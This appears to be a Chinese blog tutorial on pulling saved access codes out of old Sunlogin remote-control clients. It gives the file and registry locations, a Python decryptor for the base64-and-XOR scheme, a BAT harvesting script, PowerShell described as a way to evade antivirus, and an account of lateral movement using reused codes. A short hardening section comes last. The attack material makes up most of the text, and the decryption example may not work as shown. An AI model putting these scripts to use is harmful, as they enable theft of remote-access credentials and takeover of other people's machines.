向日葵低版本客户端凭证提取技术解析与实战

1. 向日葵远程控制软件的安全机制演变

向日葵作为国内知名的远程控制工具，其安全机制经历了多次迭代升级。早期的版本（如10.x系列）采用相对简单的配置文件存储方式，验证码仅经过base64编码处理。从11.x版本开始逐步引入注册表存储和更复杂的加密算法，到最新版本已采用动态密钥和强加密策略。

我曾在一次企业内网渗透测试中发现，超过60%的办公电脑仍在使用向日葵10.3.0-11.0.0之间的版本。这些低版本普遍存在凭证存储风险，主要原因在于：

1. 静态存储：验证码固定存放在config.ini或注册表特定位置
2. 弱加密：早期版本仅使用base64+简单异或加密
3. 权限宽松：配置文件默认允许Users组读取

实测在Windows 7系统上，即使用户权限也能直接读取C:\ProgramData\Oray\SunloginClient\config.ini文件。这种设计在便利性和安全性之间明显失衡，直到12.x版本后才有所改善。

2. 低版本凭证存储位置全解析

2.1 安装版路径差异

根据我收集的样本，不同架构的安装版存在路径差异：

bash复制# 32位系统/软件
C:\Program Files\Oray\SunLogin\SunloginClient\config.ini

# 64位系统安装32位软件
C:\Program Files (x86)\Oray\SunLogin\SunloginClient\config.ini

# 64位原生软件（11.0.0.33826_x64）
C:\Program Files\Oray\SunLogin\SunloginClient\config.ini

特别要注意的是，某些企业定制版可能修改默认安装路径。我遇到过路径包含公司名称的情况：
C:\Program Files\CompanyName\Oray\SunloginClient\

2.2 绿色版特殊处理

便携版通常会写入以下位置：

bash复制# Windows 7/10/11通用
C:\ProgramData\Oray\SunloginClient\config.ini

但有个坑点：在部分Win10系统上，ProgramData是隐藏目录。需要先执行：

cmd复制attrib -h -s C:\ProgramData

2.3 注册表存储演变

从11.x版本开始出现的注册表存储路径：

reg复制# 标准版
HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginInfo

# 绿色版
HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginGreenInfo

# 最新版（仅能获取加密数据）
HKEY_CURRENT_USER\SOFTWARE\Oray\SunLogin\SunloginClient\

3. 加密算法逆向分析

3.1 经典版本加密模式

以10.3.0版本为例，其加密流程如下：

1. 原始验证码 → Base64编码 → 逐字节异或0x12
2. 最终存储在encry_pwd字段

用Python还原加密过程：

python复制def old_encrypt(plaintext):
    import base64
    xor_key = 0x12
    encoded = base64.b64encode(plaintext.encode())
    return bytes([b ^ xor_key for b in encoded]).decode()

3.2 解密脚本改进版

原版解密脚本有时会出现padding错误，建议使用这个增强版：

python复制import base64

def sunflower_decrypt(encrypted):
    try:
        xor_key = 0x12
        decoded = bytes([ord(c) ^ xor_key for c in encrypted])
        return base64.b64decode(decoded).decode('utf-8')
    except Exception as e:
        print(f"解密失败: {str(e)}")
        return None

# 示例：解密2EIvI9VEuOI=
print(sunflower_decrypt("2EIvI9VEuOI="))

3.3 内存补丁技巧

对于某些特殊版本，还可以通过内存补丁获取明文密码。使用Cheat Engine搜索字符串"encry_pwd"后，在其内存引用处下断点，可以捕获到解密后的验证码。

4. 实战攻击链构建

4.1 自动化检测脚本

这个BAT脚本可自动识别版本并提取凭证：

bat复制@echo off
setlocal enabledelayedexpansion

:: 检测安装版
if exist "C:\Program Files\Oray\SunLogin\SunloginClient\config.ini" (
    type "C:\Program Files\Oray\SunLogin\SunloginClient\config.ini" | findstr "encry_pwd"
)

:: 检测绿色版
if exist "C:\ProgramData\Oray\SunloginClient\config.ini" (
    type "C:\ProgramData\Oray\SunloginClient\config.ini" | findstr "encry_pwd"
)

:: 检测注册表项
reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient /s | findstr "SunloginInfo"

4.2 防御规避技巧

在存在杀软的环境下，建议使用合法进程加载：

powershell复制# 通过powershell直接读取注册表
$regPath = "Registry::HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient"
Get-ItemProperty -Path $regPath | Select-Object SunloginInfo

4.3 横向移动案例

曾遇到一个真实案例：攻击者通过向日葵11.0.0的凭证复用，在内网横向移动的步骤：

1. 获取第一台主机的config.ini
2. 解密得到验证码284D0Q
3. 发现该验证码在10台机器通用
4. 通过识别码+验证码批量登录

5. 防护建议与升级指南

对于仍在使用低版本的企业，建议立即采取以下措施：

1. 强制升级策略：通过组策略推送最新版向日葵客户端
2. 权限收紧：设置config.ini的ACL仅允许SYSTEM和Administrator读取
3. 日志监控：对以下注册表键设置审计：

   code复制HKEY_USERS\.DEFAULT\Software\Oray
   HKEY_CURRENT_USER\SOFTWARE\Oray
   

实测在12.5.0版本之后，向日葵采用了基于TLS的临时凭证机制，每个会话生成一次性验证码，从根本上解决了凭证固化的问题。对于安全要求高的场景，建议启用企业版的双因素认证功能。